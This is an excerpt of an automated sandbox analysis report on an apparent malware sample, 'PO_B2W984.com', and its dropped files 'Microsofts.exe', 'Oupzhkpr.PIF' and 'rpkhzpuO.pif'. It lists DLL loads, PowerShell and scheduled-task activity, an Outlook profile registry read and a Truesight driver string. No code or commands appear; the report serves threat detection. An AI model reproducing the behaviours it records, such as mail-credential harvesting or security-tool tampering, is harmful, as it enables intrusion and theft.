                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: apphelp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: version.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: edgegdi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: url.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieframe.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iertutil.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netapi32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: userenv.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winhttp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wkscli.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netutils.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: amsi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: smartscreenps.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winmm.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wininet.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sspicli.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mswsock.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iphlpapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winnsi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??????????.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ????.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???e???????????.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???e???????????.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: tquery.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptdll.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppwmi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: slc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppcext.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winscard.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: devobj.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: edgegdi.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: textshaping.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: textinputframework.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coreuicomponents.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coremessaging.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ntmarta.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: version.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: edgegdi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: url.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieframe.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iertutil.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netapi32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: userenv.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winhttp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wkscli.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netutils.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: amsi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: smartscreenps.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winmm.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wininet.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\PO_B2W984.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: apihost.exe.lnk.5.drLNK file: ..\..\..\..\..\ACCApi\apihost.exe
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: PO_B2W984.comStatic file information: File size 2145792 > 1048576
                          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb*Q source: rpkhzpuO.pif, 00000013.00000003.23152181055.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23151187278.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23186060889.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23153094806.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbS source: rpkhzpuO.pif, 0000000F.00000003.23071203235.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23070008388.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23068650639.000000002B780000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 0000000F.00000002.23109676776.000000002B721000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23186060889.000000002E85C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: rpkhzpuO.pif, 0000000F.00000003.23070008388.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23068650639.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23152181055.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23151187278.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23153094806.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
